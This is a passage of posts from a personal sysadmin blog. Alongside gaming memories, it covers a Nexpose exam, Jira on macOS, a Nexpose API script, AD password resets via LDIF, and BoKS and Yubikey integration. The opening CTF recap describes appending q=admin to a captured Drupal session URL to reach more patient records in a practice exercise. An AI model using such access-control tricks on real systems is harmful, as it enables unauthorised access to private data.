I didn't find anything using Sanne's account on the Drupal site. But boy was I wrong! 16:00 had come and gone, when my neighbor informed me that I simply should have added q=admin to Sanne's session's URL. Her admin section would have given me access to six more patient records! Six! 

Today was a well-spent day! My first time using Metasploit! My first time trying WPA2 hacking! Putting together a great puzzle to get more and more access :) Thanks Ultimum! I'm very much looking forward to next year's CTF!


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Games I love(d): League of Legends

2016-03-20 16:41:00

The four LOL ribbons

The past two years I haven't been keeping this diary, so I've played a lot of games that I really enjoyed which I haven't written about. This's the first update in a series about games that I absolutely love (or loved) and which played an important role in my life. First up: League of Legends

LoL is the prime example of something I've often been "accused" of: "Thomas, you just can't do anything without taking it seriously!

Let's back it up a little bit... I'd heard of MOBA games before 2014: I knew of the Warcraft 3 spinoff DotA and I'd heard about LoL from my colleague Wim. They sounded like fun games, but as is often the case I never had time to give'm a try. In the summer of 2014 I started watching the LoL championships online. Season 3 was very exciting and I loved the "Road to Worlds" documentary. 

During our holiday in Austria I picked up another MOBA, on the iPad: Fates Forever. It was a very fun game and easy to pick up for newbies like myself. I got into the community and even designed a sweater for myself, with my favorite character Renwil. FF went offline in the fall of 2015, so I can't play the game anymore.

Despite watching LoL championships and playing FF I still kept away from actually playing LoL. As my mom once told me: “Whenever we’d take you somewhere new, I’d see you hanging around the sidelines, watching very intently. You were always trying to mentally grasp what was going on and how things worked. And you almost never dared to actually participate until you’d figured it out." And that's true, I was intimidated by LoL and didn't want to fsck up right from the start. 

By the end of December 2014 I had finished a long and hard certification process (RHCE) and I told myself: "This is it! I'm gonna take three months and do nothing except gaming!". That's when I dove in! And that's where the aforementioned accusation comes in ^_^

I didn't dick around with LoL! I decided that I was going to study hard to play a limited pool of characters that each fit two roles, so I could be of good use to any team I'd join for a game. Volibear was my very first character and I shelled out the money to buy him out-right. What's there not to love! A huge, friggin' polar bear with armor! I learned to play him in both toplane and the jungle. But my true love would become the support role, which is a role that suits my real life: I love being the one who supports his team, so they can win the day. Soraka is my all-time favorite character (my "main") and later on I also learned to play Janna, Annie, Lux and Morgana.

To be honest, I feel that I got pretty good. I found a few friends with whom I could play great games and I often got recognized as a valuable contributor. Over the three to four months which I played the game, I worked myself up to level 30 (to most people the "real" start of the game) and I was awared all four "honor ribbons" (shown top-left). I'd pore over patch notes and study pro games as well as replays of my own team's games. It was a lot of hard work, but I had an absolute blast! 

By April of 2015 the time came for me to return to studying. I started my Oracle studies by then and I also got some extra work. I said my farewells to my friends, most importantly Hedin (who played as Limerick / Dovetail) from the Farroe Islands. He was an absolute joy to play with! I never did start Ranked play, so I don't know how good I could've gotten. I'm sure that I was only on the very first step of properly learning League of Legends.


kilala.nl tags: ,

View or add comments (curr. 1)

Passed my NACA examination

2016-03-16 08:02:00

NACA logo

With many thanks to Nexpose consultant Mark Doyle for his trust in me and his coaching and with thanks to my colleagues at $CLIENT for offering me the chance to learn something new!

This morning I passed my NACA (Nexpose Advanced Certified Administrator) examination, with an 85% score.

While preparing for the exam I searched online to find stories of test takers, describing their experiences with the NCA and NACA exams. Unfortunately I couldn't really find any, aside from one blogpost from 2012. 

For starters, the exam will be taken through Rapid7's ExpertTracks portal. If you're going to take their test, you might as well register beforehand. Purchasing the voucher through their website proved to be interesting: I ran into a few bugs which prevented my order from being properly processed. With the help of Rapid7's training department, things were sorted out in a few days and I got my voucher.

The examination site is nice enough, though there are two features that I missed while taking the test:

  1. There is no option to mark your questions for review, a feature most computer-based exams provide.
  2. Even if you could mark your questions, there apparently is no index page that allows you to quickly jump to specific questions. 

I made do with a notepad (to mark the questions) and by editing the URL in the address bar, to access the questions I wanted to review. 

The exam covers 75 questions, is "open book" and you're allowed to take 120 minutes. I finished in 44 minutes, with an 85% score (80% needed to pass). None of the questions struck me as badly worded, which is great! No apparent "traps" set out to trick you. 


kilala.nl tags: , ,

View or add comments (curr. 2)

Running Jira locally on Mac OS X

2016-03-10 19:39:00

Jira on OS X

It's no secret that I'm a staunch lover of Atlassian's Jira, a project and workload management tool for DevOps (or agile) teams. I was introduced to Jira at my previous client and I've introduced it myself at $CURRENTCLIENT. The ease with which we can outline all of our work and divide it among the team is wonderful and despite not actually using "scrum", we still reap plenty of benefits!

Unfortunately I couldn't get an official Jira project setup on $CUSTOMER's servers, so instead I opted for a local install on my Macbook. Sure, it foregoes a lot of the teamwork benefits that Jira offers, but at least it's something. Besides, this way I can use Jira for two of my other projects as well! 

Getting Jira up and running with a standalone installation on my Mac took a bit of fiddling. Even Atlassian's own instructions were far from bullet proof.

Here's what I did:

  1. Download the OS X installer for Jira. It comes as a .tgz.
  2. Extract the installer wherever you'd like; I even kept it in ~/Downloads for the time being.
  3. Make a separate folder for Jira's contents, like ~/Documents/Jira.
  4. Ensure that you have Java 8 installed on your Mac. Get it from Oracle's website.
  5. Browse to the unpacked Jira folder and find the script "check-java.sh". You'll need to change one line so it reads as follows, otherwise Jira won't boot: "$_RUNJAVA" -version 2>&1 | grep "java version" | (
  6. Find the files "start-jira.sh" and "stop-jira.sh" and add the following lines at their top:
export PATH="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin:$PATH"
export JAVA_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JRE_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JIRA_HOME="/Users/thomas/Documents/Jira"

You should now be able to startup Jira, from the Terminal, by running the "start-jira.sh" script. The best thing is that Jira handles the sleep mode a laptop just fine (at least it does so on OS X), so you can safely forget about your Terminal session and close it. I've had Jira run for days on end, with many sleeps and resumes each day!

Upgrading Jira should be as easy as downloading the latest archive (step 1) and then repeating steps 5 and 6 on the files from the new installation. All Jira data lives outside of the installation path, thanks to step 3.

EDIT: If you ever need to move your Jira data directory elsewhere (or rename it), then you'll need to re-adjust the setting of JIRA_HOME in the shell scripts. You will also need to change the database path in dbconfig.xml (which lives inside your Jira data directory). 


kilala.nl tags: , ,

View or add comments (curr. 0)

Using the Nexpose API in Linux shell scripts to bulk-create users

2016-03-02 15:09:00

The past few weeks I've spent at $CLIENT, working on their Nexpose virtual appliances. Nexpose is Rapid7's automated vulnerability scanning tool, which may also be used in unison with Rapid7's more famous product: Metasploit. It's a pretty nice tool, but it certainly needs some work to get it all up and running in a large, corporate environment.

One of the more practical aspects of our setup, is the creation of user accounts in Nexpose's web interface. Usually, you'd have to click a few times and enter a bunch of textfields for each user. This gets boring for larger groups of users, especially if you have more than one Security Console host. To make our lives just a little easier, we have at least setup the hosts to authenticate against AD.

I've fiddled around with Nexpose's API this afternoon, and after a lot of learning and trying ("Van proberen ga je het leren!" as I always tell my daughter) I've gotten things to work very nicely! I now have a basic Linux shell script (bash, but should also work in ksh) that creates user accounts in the Nexpose GUI for you!

Below is a small PoC, which should be easily adjusted to suit your own needs. Enjoy!

=====================================

#!/bin/bash
 
# In order to make API calls to Nexpose, we need to setup a session.
# A successful login returns the following:
# <LoginResponse success="1" session-id="F7377393AEC8877942E321FBDD9782C872BA8AE3"/>
 
NexposeLogin() {
        NXUSER=""
        NXPASS=""
        NXSERVER="127.0.0.1"
        NXPORT="3780"
        API="1.1"
        URI="https://${NXSERVER}:${NXPORT}/api/${API}/xml"
        NXSESSION=""
 
        echo -e "\n===================================="
        echo -e " LOGGING IN TO NEXPOSE, FOR API CALLS."
        echo -e "\n===================================="
        echo -e "Admin username: \c"; read NXUSER
        echo -e "Admin password: \c"; read NXPASS
 
        LOGIN="<LoginRequest synch-id='0' password='${NXPASS}' user-id='${NXUSER}'></LoginRequest>"
 
        export NXSESSION=$(echo "${LOGIN}" | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $4}')
}
 
# Now that we have a session, we can make new users.
#    You will need to know the ID number for the desired authenticator.
# You can get this with: <UserAuthenticatorListingRequest session-id='...'/>
#    A user request takes the following shape, based on the API v1.1 docu.
#  <UserSaveRequest session-id='...'>
#  <UserConfig id="-1" role-name="user" authsrcid="9" authModule="LDAP" name="apitest2"
#   fullname="Test van de API" administrator="0" enabled="1">
#  </UserConfig>
#  </UserSaveRequest>
# On success, this returns:
#  <UserSaveResponse success="1" id="41">
# </UserSaveResponse>
 
NexposeCreateUser() {
        NEWUSER="${1}"
        SUCCESS="0"
        NXAUTHENTICATOR="9" # You must figure this out from Nexpose, see above
        NXROLE="user"
        SCRATCHFILE="/tmp/$(basename ${0}).temp"
 
        echo "<UserSaveRequest session-id='${NXSESSION}'>" > ${SCRATCHFILE}
        echo "<UserConfig id='-1' role-name='${NXROLE}' authsrcid='${NXAUTHENTICATOR}' authModule='LDAP' name='${NEWUSER}' fullname='${NEWUSER}' administrator='0' enabled='1'>" >> ${SCRATCHFILE}
        echo "</UserConfig>" >> ${SCRATCHFILE}
        echo "</UserSaveRequest>" >> ${SCRATCHFILE}
 
        SUCCESS=$(cat ${SCRATCHFILE} | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $2}')
        [[ ${SUCCESS} -eq 0 ]] && logger ERROR "Failed to create Nexpose user ${NEWUSER}."
        rm ${SCRATCHFILE}
}
 
NexposeLogin
NexposeCreateUser apitest1

kilala.nl tags: , ,

View or add comments (curr. 0)

My first online gaming experience: Darkscapes MUD

2016-01-06 06:04:00

Fifteen years ago I graduated college at Hogeschool Utrecht. Before I got that far, I spent four years studying electronics, programming, telecommunications and more. I also had a lot of fun with my classmates! At the time I was already familiar with role playing as well as trading card games (D&D, Magic, etc), but my classmate Erik introduced me to the joys of Warhammer 40k and World of Darkness games. 

My biggest time waster in first and second year was something entirely different though: it was my introduction to online gaming, as well my first MMORPG! A few students at HvU ran a MUD (multi-user dungeon) on a school server and I spent hours questing and talking to other players. It was a grand experience, especially since the text-based interface was light enough to even work on a very slow Internet connection. Through the game I went on to meet Maya Deva, a woman who was absolutely dedicated to her D&D games and who went on to work for TSR a little while. 

Over the years I've fondly remembered that MUD, whose name escaped me. I'd always wondered whether it was still running on some hidden-away server somewhere.

Turns out that it has! Much to my surprise, my ITGilde colleague Mark was one of the admins of that MUD, which was called DarkScapes. It's not the same instance I used to play in (my account "Beowulf" was gone), but it's a rebuild based off old backups. Still, it was great to find this relic of my past and to walk that world around again!


kilala.nl tags: ,

View or add comments (curr. 0)

Changing users' passwords in Active Directory 2016, from anywhere

2016-01-04 09:28:00

As part of an ongoing research project I'm working on, I've had the need to update an end-users' password in Microsoft's Active Directory. Not from Windows, not through "ADUC" (AD Users and Computers), but from literally anywhere. Thankfully I stumbled upon this very handy lesson from the University of Birmingham. 

I've tweaked their exemplary script a little bit, which results in the script shown at the bottom of this post. Using said script as a proof of concept I was able to show that the old-fashioned way of using LDAP to update a user's password in AD will still work on Windows Server 2016 (as that's the target server I run AD on). 

 

Called as follows:

$ php encodePwd.php user='Pippi Langstrumpf' newpw=Bora38Sr > Pippi.ldif

Resulting LDIF file:

$ cat Pippi.ldif 
dn: CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl
changetype: modify
replace: unicodePwd
unicodePwd:: IgBOAG8AggBhQDMAOQBGAHIAIgA=

Imported as follows:

$ ldapmodify -f Pippi.ldif -H ldaps://win2016.broehaha.nl -D 'CN=Administrator,CN=Users,DC=broehaha,DC=nl' -W
Enter LDAP Password: 
modifying entry "CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl"

Once the ldapmodify has completed, I can login to my Windows Server 2016 host with Pippi's newly set password "Bora38Sr".

 


<?php

function EncodePwd($pw) {
  $newpw = '';
  $pw = "\"" . $pw . "\"";
  $len = strlen($pw);
  for ($i = 0; $i < $len; $i++)
      $newpw .= "{$pw{$i}}\000";
  $newpw = base64_encode($newpw);
  return $newpw;
}

 if($argc > 1) {
	foreach($argv as $arg)  {
	list($argname, $argval) = split("=",$arg);
	$$argname = $argval;
	}
  }

  $userdn = 'CN='.$user.',CN=Users,DC=broehaha,DC=nl';

  $newpw64 = EncodePwd($newpw);

  $ldif=<<<EOT
dn: $userdn
changetype: modify
replace: unicodePwd
unicodePwd:: $newpw64
EOT;

  print_r($ldif);

?>

kilala.nl tags: , ,

View or add comments (curr. 0)

Integrating BoKS and Windows Active Directory

2015-12-18 10:59:00

As part of an ongoing research project for Fox Technologies I had a need for a private Windows Active Directory server. Having never built a Windows server, let alone a domain controller, it's been a wonderful learning experience. The following paragraphs outline the process I used to build a Windows AD KDC and how I set up the initlal connections from the BoKS hosts.

 

Windows server setup

I run all my tests using the Parallels Desktop virtualization product. The first screenshot below will show five hosts running concurrently on my Macbook Air: a Windows Server 2012 host and four hosts running RHEL6 (BoKS master, replica and two clients). 

Even installing Windows Server 2012 proved to be a hassle, insofar that the .ISO image provided by Microsoft (for evaluation purposes) appears to be corrupt. Every single attempt to install resulted in error code 0x80070570 halfway through. This is a known issue and the only current workaround appears to lie in using an alternative ISO image provided by a good samaritan. Of course, one ought to be leery about using installation software not provided by the actual vendor, so caveat emptor

Once the installation has completed, setup basic networking as desired. Along the way I opted to disable IPv6 as this would make the setup and troubleshooting of Kerberos a bit more complicated. 

Next up, it's time to add the appropriate Roles to the new Windows server. This is done through Windows Server Manager, from the "Manage" menu one should pick "Add roles and features". Add:

This tutorial by Rackspace quickly details how to setup the Domain Services. In my case I set up the forest "broehaha.nl" which matches the name of the domain (and my LDAP directory on Linux). Setting up the CA (certificate authority) requires stepping through a wizard, using the default values provided. 

BoKS will also require the installation of the (deprecated) role Identity Manager for Unix. Microsoft provide excellent instructions on how to install these features on Windows 2012, through the command line. In short, the commands are (NOTE the disabling of NIS):

Dism.exe /online /enable-feature /featurename:adminui /all
Dism.exe /online /disable-feature /featurename:nis /all
Dism.exe /online /enable-feature /featurename:psync /all

 

The Windows AD KDC should be in sync with the time as running on the Linux hosts. Setup NTP to use the same NTP servers as follows:

w32tm /config /manualpeerlist:pool.ntp.org /syncfromflags:MANUAL
Stop-Service w32time
Start-Service w32time

 

Export the root CA certicate by running:

certutil -ca.cert windows_ca.crt >windows_ca.txt
certutil -encode windows_ca.crt windows_ca.cer

 

You may now SCP the windows_ca.cer file to the various Linux hosts (for example by using pscp, from the Putty team). 

Now it's time to put some data into DNS and Active Directory. Using the "AD Users and Computers" tool, create Computer records for all BoKS hosts. These records will not automatically include the full DNS names, as these will be filled at a later point in time. Using the DNS tool, create a forward lookup zone for your domain (broehaha.nl in my case) as well as a reverse lookup zone for your IP range (10.211.55.* for me). In the forward zone create A records for your Windows and your Linux hosts (the wizard can automatically create the reverse PTR records). See below screenshots for some examples.

 

 

Linux / BoKS server setup

My Linux hosts were already installed before, as part of my BoKS testing environment. All hosts run RHEL6 and BoKS 7.0. The master server has Apache and OpenLDAP running for my Yubikey testing environment

First order of business is to ensure that the Linux hosts all use the Windows DNS server. Best way to arrange this is to ensure that /etc/sysconfig/network-scripts/ifcfg-eth0 (adjust for the relevant interface name) has entries for the DNS server and search domains. In my case it's as follows, with DNS2 being my default DNS for everything outside of my testing environment):

DNS1=10.211.55.70
DNS2=10.211.55.1
DOMAIN=broehaha.nl

 

As was said, NTP should be running to have time synchronization among all servers involved.

Your Kerberos configuration file should be adjusted to match your AD domain:

[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 dns_lookup_realm = true
 dns_lookup_kdc = true
 ticket_lifetime = 24h
 renew_lifetime = 7d

 default_realm = BROEHAHA.NL
 forwardable = true
[realms]
 BROEHAHA.NL = {
  kdc = windows.broehaha.nl
  admin_server = windows.broehaha.nl
 }

[domain_realm]
 .broehaha.nl = BROEHAHA.NL

 

If so desired you may test the root CA certificate from the Windows server, after which the certificate may be installed:

openssl x509 -in /home/thomas/windows_ca.cer -subject -issuer -purpose
cp /home/thomas/windows_ca.cer /etc/openldap/cacerts/
cacertdir_rehash /etc/openldap/cacerts

 

You should be able to test basic access to AD as follows:

ldapsearch -v -x -H ldaps://windows.broehaha.nl:636 -D "CN=Administrator,CN=Users,DC=BROEHAHA,DC=NL" -b "DC=BROEHAHA,DC=NL" -W
ldapsearch -vv -Y GSSAPI -H ldap://windows.broehaha.nl -b "DC=BROEHAHA,DC=NL"

 

Now you may join your Linux host(s) to the Windows AD domain:

kinit bokssync@BROEHAHA.NL Password for bokssync@BROEHAHA.NL:
adjoin join -K windows.broehaha.nl BROEHAHA.NL Administrator@BROEHAHA.NL

 

If you now use "AD Users and Computers" on the Windows server, you'll notice that the fully qualified DNS name of the Linux host has been filled in. 

Basic AD connectivity has now been achieved. We'll start putting it to good use in an upcoming tutorial.


kilala.nl tags: , ,

View or add comments (curr. 0)

In-between assignments? What an opportunity!

2015-11-23 14:38:00

It's been two weeks now since I've left my friends and colleagues at my previous assignment. I didn't have a new gig lined up, so for now I'm "in-between assignments". Am I having a dreary time and am I scrambling for something new? Maybe surprisingly, I'm not! I've been busier than ever!

I'd argue that some downtime between jobs is an excellent opportunity! 

  1. Learn something new
  2. Meet new people
  3. Deflate

 

Learn something new

Now is your chance to finally get started on all those things you've been meaning to learn and study! Make sure to plan a few hours every day to spend on research and studies. This will also help you maintain your workday rhythm. 

 

Meet new people

Of course you're going job hunting! Putting that aside though, I've found it tremendous to also go and meet people in my business just for the heck of it. Some would call this networking, I just call it fun :)

Why not visit one of your industry's convention, now that you have the time? Or use Meetup.com to find social gatherings that look interesting or beneficial. Every week there's something you could help out with or learn about.

 

Deflate

And you know what? Relish your downtime! Get some exercise, go for a walk, enjoy the scenery. Feeling ambitious and feeling the urge to start running? Give the famous "Couch to 5k" schedule a shot! Not thinking about work a few hours may help you a bit in pushing harder when you need to!

 

What have I been doing?

I've spent a few days learning a new programming language (Python in my case) by signing up for Codecademy. I've also spent a few days learning about MFA tokens and on integrating those with software I'm already familiar with. And now I'm also hitting the books on Oracle and SQL. 

I've hit the Blackhat Europe convention and learned a lot of new things. I'll also be meeting with people from a big-name college and with an IT service provider. Both talks could perhaps lead to something in the future, but for now I simply want to learn about their activities.  

 

And after all that hard work-that's-not-actually-work? I'm deflating by taking some walks around town and by playing a game or two. I really ought to thank my employer for this great "work-cation".


kilala.nl tags: ,

View or add comments (curr. 0)

Integrating FoxT BoKS ServerControl with Yubikey (MFA) authentication

2015-11-17 10:03:00

As promised, I’ve put some time into integrating the Yubikey Neo that I was gifted with Fox Technologies BoKS.  For those who are not familiar with BoKS, here’s a summary I once wrote. I’ve always enjoyed working with BoKS and I do feel that it’s a good solution to the RBAC-problems we may have with Linux and Windows servers. So when I was gifted a Yubikey last week, I couldn’t resist trying to get it to work with BoKS.

My first order of business was to set up a local, private Yubikey validation infrastructure. This was quickly followed by using an LDAP server to host both user account data and Yubikey bindings (like so). And now follows the integration with BoKS!

 

Yubikey and BoKS: it takes a little work

The way I see it, there’s at least three possible integration solutions that us “mere mortals” may achieve. There are definitely other ways, but they require access to the BoKS sources which we won’t get (like building a custom authenticator method that uses YKCLIENT).

  1. Adjust your software to use both Yubikey and then PAM to use BoKS.
  2. Adjust your software to use PGP/SSH keys stored on Yubikey.
  3. Adjust your software to authenticate against Kerberos, which in turn uses Yubikey OTP. BoKS allows Kerberos authentication by default.

Putting this into a perspective most of us feel comfortable with, SSH, this would lead to:

  1. Run a second SSH daemon next to the BoKS-provided SSH. This second daemon will only allow Yubikey+password MFA logins and is only accessible to a select group of people. This requires the definition of a custom access method and some PAM customizations.
  2. A solution like this, with PGP/SSH keys.
  3. Using BoKS-sshd, together with the Kerberos authentication method defined by BoKS

In my testing environment I’ve gotten solution #1 to work reliably. The next few paragraphs will describe my methods.

 

Requirements

The following assumes that you already have:

All the changes described will need to be made on all your BoKS systems. The clients running the special SSH daemon with Yubikey support will need the PAM files as well as all the updates to the BoKS configuration files. The master and replicas will technically not need the changes you make to the SSH daemon and the PAM files, unless they will also be running the daemon. Of course, once you've gotten it all to run correctly, you'd be best off to simply incorporate all these changes into your custom BoKS installation package!

 

Let’s build a second daemon

BoKS provides it’s own fork of the OpenSSH daemon and for good reason! They expanded upon its functionality greatly, by allowing much greater control over access and fine-grained logging. With BoKS you can easily allow someone SCP access, without allowing shell access for example. One thing FoxT did do though, is hard-disable PAM for this custom daemon. And that makes it hard to use the pam_yubico module. So what we’ll do instead, is fire up another vanilla OpenSSH daemon with custom settings.

Downside to this approach is that you lose all fine-grained control that BoKS usually provides over SSH. Upside is that you’re getting a cheap MFA solution :) Use-cases would include your high-privileged system administrators using this daemon for access (as they usually get full SSH* rights through BoKS anyway), or employees who use SSH to specifically access a command-line based application which requires MFA.

The following commands will set up the required configuration files. This list assumes that BoKS is enabled (“sysreplace replace”), because otherwise the placement of the PAM files would be slightly different.

I’ve edited /etc/ssh/yubikey-sshd_config, to simply adjust the port number from “22” to “2222”. Pick a port that’s good for you. At this point, if you start “/usr/sbin/yubikey-sshd -f /etc/ssh/yubikey-sshd_config” you should have a perfectly normal SSH with Yubikey authentication running on port 2222.

You can ensure that only Yubikey users can use this SSH access by adding “AllowGroups yubikey” to the configuration file (and then adding said Posix group to the relevant users). This ensures that access doesn’t get blown open if BoKS is temporarily disabled.

Finally, we need to adjust the PAM configuration so yubikey-sshd starts using BoKS. I’ve changed the /etc/opt/boksm/pam.d/yubikey-sshd file to read as follows:

#%PAM-1.0
auth      required   pam_sepermit.so
auth      required   pam_yubico.so mode=client ldap_uri=ldap:/// ldapdn= user_attr=uid yubi_attr=yubiKeyId id= key= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth      required   pam_boks.so.1
account   required   pam_boks.so.1
account   required   pam_nologin.so
password  required   pam_boks.so.1
# pam_selinux.so close should be the first session rule
session   required   pam_selinux.so close
session   required   pam_loginuid.so
session   required   pam_boks.so.1
# pam_selinux.so open should only be followed by sessions to be executed in the user context
session   required   pam_selinux.so open env_params
session   optional   pam_keyinit.so force revoke

 

Caveat: public key authentication

Unless you are running OpenSSH 6.x as a daemon (which is NOT included with RHEL6 / CentOS 6), then you must disable public key authentication in /etc/ssh/yubikey-sshd_config. Otherwise, the pubkey authentication will take precedent and the Yubikey will be completely bypassed.

So, edit yubikey-sshd_config to include:

 

Reconfiguring BoKS

The file /etc/opt/boksm/sysreplace.conf determines which configuration files get affected in which ways when BoKS security is either activated or deactivated. Change the “pamdir” line by appending “yubikey-sshd”:

file pamdir relinkdir,copyfiles,softlinkfiles /etc/pam.d $BOKS_etc/pam.d vsftpd remote login passwd rexec rlogin rsh su gdm kde kdm xdm swrole gdm-password yubikey-sshd

The file /etc/opt/boksm/bokspam.conf ties PAM identifiers into BoKS access methods. Whenever PAM sends something to pam_boks.so.1, this file will help in figuring out what BoKS action the user is trying to perform. At the bottom of this file I have added the following line:

yubikey-sshd   YUBIKEY-SSHD:${RUSER}@${RHOST}->${HOST}, login, login_info, log_logout, timeout

The file /etc/opt/boksm/method.conf defines many important aspects of BoKS, including authentication and access “methods”. The elements defined in this file will later appear in “access routes” (BoKS-lingo for rules). At the bottom of this file I have added, which is a modification of the existing SSH_SH method:

METHOD YUBIKEY-SSHD:  user@host->host,    -prompt, timeout, login, noroute, @-noroute, usrqual, uexist, add_fromuser

By now it’s a good idea to restart your adjusted SSH daemon and BoKS. Check the various log files (/var/log/messages, /var/opt/boksm/boks_errlog) for obvious problems.

 

Assigning access

My user account BoKS.MGR:thomas has userclass (BoKS-speak for “role”) “BoksAdmin”. I’ve made two changes to my account (which assumes that group “yubikey” already exists):

This leaves me as follows:

[root@master ~]# lsbks -aTl *:thomas
Username:                     BOKS.MGR:thomas
User ID:                      501
User Classes:                 BoksAdmin
Group ID:                     501
Secondary group ID's:         505 (ALL:yubikey)
[...]
Assigned authenticator(s):    ssh_pk
                              ldapauth
Assigned Access Routes via User Classes
BoksAdmin                     login:*->BOKS.MGR 00:00-00:00, 1234567
                              su:*->root@BOKS.MGR 00:00-00:00, 1234567
                              yubikey-sshd:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567
                              ssh*:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567

 

Proof: Pam_yubico works with pam_BoKS

The screenshot below shows two failed login attempts by user Sarah, who does have a Yubikey but who lacks the Posix group “yubikey”. Below is a successful login by user Thomas who has both a Yubikey and the required group.

yubikey BoKS ssh login failure

The screenshot below shows a successful login by myself, with the resulting BoKS audit log entry.

yubikey ssh BoKS login success


kilala.nl tags: , , ,

View or add comments (curr. 0)

A new project: a private Yubikey server infrastructure

2015-11-14 20:48:00

I was recently gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I’d heard about Ubico’s nifty little USB device before but never really understood what the fuss was about. I’m no fan of Facebook or GMail, so instead I thought I’d see what Yubikey could do in a Unix environment!

I've been playing with the YK for two days now and I've managed to get the following working quite nicely:

I have written an extensive tutorial on how I built the above. In the near future you may expect expansions, including tie-in to LDAP as well as BoKS. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Building a local Yubikey server infrastructure

2015-11-13 23:05:00

I recently was gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I’d heard about Ubico’s nifty little USB device before but never really understood what the fuss was about. I’m no fan of Facebook or GMail, so instead I thought I’d see what Yubikey could do in a Unix environment!

In the next few paragraphs I will explain how I built the following:

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.

 

Yubikey infrastructure: how does it all work?

Generally speaking, any system that runs authentication based on Yubikey products, will communicate with the YubiCloud, e.g. the Yubico servers. In a corporate environment this isn’t desirable, which is why Yubico have created an open source, on-premises solution consisting of two parts: ykval and ykksm.

yubikey infrastructure

Any product desiring to use YK authentication will contact the ykval server to verify that the card in question is indeed valid and used by the rightful owner. To achieve this, ykval will contact the ykksm server and attempt to perform an encryption handshake to see if the card truly matches the expected signatures.

Yubico provide open source tools and APIs that help you build YK authentication into your software. In the case of SSH (and other Unix tools), all of this can be achieved through PAM. There are many different options of authenticating your SSH sessions using a Yubikey and I’ve opted to go with the easiest: the OTP, one-time-password, method. I’m told that you can also use YK in a challenge/response method with later versions of OpenSSH. It’s also possible to actually use your YK as a substitute for your SSH/PGP keys.

 

Caveat: AES keys

The AES keys stored in YKKSM cannot be the ones associated with your Yubikey product when they leave the factory. Yubico no longer make these keys available to their customers. Thus, in order to run your own local Yubikey infrastructure, you will be generating your own AES keys and storing them on the Yubikey.

 

Caveat: OpenSSH versions

My whole project revolves around using CentOS 6.7. Red Hat have made certain choices with regards to upgrading and patching of the software that’s part of RHEL and thus 6.x “only” runs OpenSSH 5.2. This means that a few key features from OpenSSH 6.2 (which are great to use YK as optional MFA) are not yet available. Right now we’re in an all-or-nothing approach :)

 

Caveat: SELinux and Yubikey

 

If we have SELinux enabled, it has been suggested that the following tweaks will be needed:

 

Requirements:

On the server(s) you will need to install the following packages through Yum: git-core httpd php mysql-server make php-curl php-pear php-mysql wget help2man mcrypt php-mcrypt epel-release. After making EPEL available, also install “pam_yubico” and “ykclient” through Yum.

On the client(s) you will only need to install both “epel-release” and “pam_yubico” (through EPEL). Installing “ykclient” is optional and can prove useful later on.

On the server(s) you will need to adjust /etc/sysconfig/iptables to open up ports 80 and 443 (https is not included in my current documentation, but is advised).

 

Installation of the server:

EPEL has packages available for both the ykval and the ykksm servers. However, I have chosen to install the software through their GIT repository. Pulling a GIT repo on a production server in your corporate environment might prove a challenge, but I’m sure you’ll find a way to get the files in the right place :D

First up, clone the GIT repos for ykval and ykksm:

 

A few tweaks are now needed:

From this point onwards, you may work your way through the vendor-provided installation guides:

  1. Install guide for YKKSM (also included in GIT)
  2. Install guide for YKVAL (also included in GIT)

More tweaks are needed once you are finished:

Restart both MySQL and Apache, to make sure all your changes take effect.

 

Initial testing of the infrastructure

We have now reached a point where you may run an initial test to make sure that both ykval and ykksm play nicely. First off, you may register a new client API key, for example:

$ ykval-gen-clients --urandom --notes "Client server 2"
5,b82PeHfKWVWQxYwpEwHHOmNTO6E=

This has registered client number 5 (“id”) with the API key “b82PeHfKWVWQxYwpEwHHOmNTO6E=”. Both of these will be needed in the PAM configuration later on. Of course you may choose to reuse the same ID and API key on all your client systems, but this doesn’t seem advisable. It’s possible to generate new id-key pairs in bulk and I’m sure that imaginative Puppet or Chef administrators will cook up a nice way of dispersing this information to their client systems.

You can run the actual test as follows. You will recognize the client ID (“5”) and the API key from before. The other long string, starting with “vvt…” is the output of my Yubikey. Simply tap it once to insert a new string. The verification error shown below indicates that this OTP has already been used before.

$ ykclient —url "http://127.0.0.1/wsapi/2.0/verify" --apikey b82PeHfKWVWQxYwpEwHHOmNTO6E=
     5 vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv --debug
Input:
  validation URL: http://127.0.0.1/wsapi/2.0/verify
  client id: 5
  token: vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv
  api key: b82PeHfKWVWQxYwpEwHHOmNTO6E=
Verification output (2): Yubikey OTP was replayed (REPLAYED_OTP)

For the time being you will NOT get a successful verification, as no Yubikeys have been registered yet.

 

Registering user keys

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.

As I mentioned before, you cannot retrieve the AES key for your Yubikey to include in the local KSM. Instead, you will be generating new keys to be used by your end-users. There’s two ways to go about this:

In either case you will need to so-called Yubikey Personalization Tools, available for all major platforms. Using this tool you will either input or generate and then store the new key onto your Yubikey.

 

yubikey personalization tools

 

The good thing about the newer Yubico hardware products is that they have more than one “configuration slot”. By default, the factory will only fill slot 1 with the keys already registered in YubiCloud. This leaves slot 2 open for your own use. Of course, slot 1 can also be reused for your own AES key if you so desire.

It’s mostly a matter of user friendliness:

In my case I’ve generated the new key through the Personalization Tool and then inserted it into the ykksm database in the quickest and dirtiest method: through MySQL.

$ mysql
USE ykksm;
